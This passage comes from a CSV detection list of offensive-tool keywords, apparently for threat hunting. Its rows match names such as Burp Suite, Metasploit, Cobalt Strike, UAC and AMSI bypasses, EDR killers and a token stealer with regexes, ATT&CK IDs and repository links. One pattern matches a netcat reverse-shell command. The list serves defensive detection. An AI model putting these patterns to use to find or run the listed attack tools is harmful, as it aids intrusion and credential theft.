"*burpcollaborator.net*",".{0,1000}burpcollaborator\.net.{0,1000}","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BurpFunctions.java*",".{0,1000}BurpFunctions\.java.{0,1000}","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","683","110","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" "*burpitem.py*",".{0,1000}burpitem\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*burplog.py*",".{0,1000}burplog\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*BurpShiroPassiveScan.jar*",".{0,1000}BurpShiroPassiveScan\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation 
tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*burpstate.py*",".{0,1000}burpstate\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*Burpsuite*",".{0,1000}Burpsuite.{0,1000}","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*burpsuite*.exe*",".{0,1000}burpsuite.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*burpsuite*.jar*",".{0,1000}burpsuite.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. 
and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*burpsuite*.sh*",".{0,1000}burpsuite.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*burpsuite*.zip*",".{0,1000}burpsuite.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BurpSuiteCn.jar*",".{0,1000}BurpSuiteCn\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*BurpSuiteHTTPSmuggler*",".{0,1000}BurpSuiteHTTPSmuggler.{0,1000}","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation 
tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","683","110","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" "*BurpSuite-SecretFinder*",".{0,1000}BurpSuite\-SecretFinder.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1749","335","2024-03-17T17:15:56Z","2020-06-08T10:50:12Z" "*burp-vulners-scanner-*.jar*",".{0,1000}burp\-vulners\-scanner\-.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*burp-xss-sql-plugin*",".{0,1000}burp\-xss\-sql\-plugin.{0,1000}","offensive_tool_keyword","burpsuite","find several bugbounty-worthy XSSes. 
OpenRedirects and SQLi.","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/attackercan/burp-xss-sql-plugin","1","1","N/A","N/A","1","45","12","2016-09-28T21:46:18Z","2016-08-17T14:05:24Z" "*buster -e * -f john -l doe -b '****1989'*",".{0,1000}buster\s\-e\s.{0,1000}\s\-f\sjohn\s\-l\sdoe\s\-b\s\'.{0,1000}.{0,1000}.{0,1000}.{0,1000}1989\'.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*busterPayloads.txt*",".{0,1000}busterPayloads\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*busybox nc * -e sh*",".{0,1000}busybox\snc\s.{0,1000}\s\-e\ssh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*bWV0YXNwbG9pdA==*",".{0,1000}bWV0YXNwbG9pdA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*byakugan/bin/*",".{0,1000}byakugan\/bin\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Bye_Explorer.ino*",".{0,1000}Bye_Explorer\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*byinarie/teams_dump*",".{0,1000}byinarie\/teams_dump.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","9","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*byinarie/teams_dump*",".{0,1000}byinarie\/teams_dump.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*BYOVD_kill_av_edr.*",".{0,1000}BYOVD_kill_av_edr\..{0,1000}","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","1","N/A","10","3","245","46","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" "*Bypass Success! Now impersonating the forged token* Loopback network auth should be seen as elevated now*",".{0,1000}Bypass\sSuccess!\sNow\simpersonating\sthe\sforged\stoken.{0,1000}\sLoopback\snetwork\sauth\sshould\sbe\sseen\sas\selevated\snow.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*bypass_cmdinject*",".{0,1000}bypass_cmdinject.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypass_powershell_protections*",".{0,1000}bypass_powershell_protections.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Bypass-4MSI*",".{0,1000}Bypass\-4MSI.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*bypass-amsi*",".{0,1000}bypass\-amsi.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*BypassAV.exe*",".{0,1000}BypassAV\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike plugin for quickly generating anti-kill executable files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/hack2fun/BypassAV","1","1","N/A","10","10","871","124","2020-07-19T15:46:54Z","2020-02-17T02:33:14Z" "*bypassBetterDiscord(*",".{0,1000}bypassBetterDiscord\(.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*bypass-classic.dll*",".{0,1000}bypass\-classic\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*BypassCredGuard/zipball*",".{0,1000}BypassCredGuard\/zipball.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" 
"*BypassCredGuard-master*",".{0,1000}BypassCredGuard\-master.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*BYPASS-DINVOKE*.dll*",".{0,1000}BYPASS\-DINVOKE.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*BYPASS-DINVOKE.dll*",".{0,1000}BYPASS\-DINVOKE\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*BYPASS-DINVOKE_MANUAL_MAPPING.dll*",".{0,1000}BYPASS\-DINVOKE_MANUAL_MAPPING\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*bypass-pipe.c*",".{0,1000}bypass\-pipe\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bypass-powershell.ps1*",".{0,1000}bypass\-powershell\.ps1.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*BypassUAC *.exe*",".{0,1000}BypassUAC\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*bypassuac fodhelper*",".{0,1000}bypassuac\sfodhelper.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" 
"*Bypass-UAC*",".{0,1000}Bypass\-UAC.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*bypassUAC*.boo*",".{0,1000}bypassUAC.{0,1000}\.boo.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*bypassUAC*.py*",".{0,1000}bypassUAC.{0,1000}\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*--bypass-uac*--logontype*",".{0,1000}\-\-bypass\-uac.{0,1000}\-\-logontype.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*bypassuac_comhijack.rb*",".{0,1000}bypassuac_comhijack\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_compdefaults*",".{0,1000}bypassuac_compdefaults.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_compmgmtlauncher*",".{0,1000}bypassuac_compmgmtlauncher.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_eventvwr*",".{0,1000}bypassuac_eventvwr.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 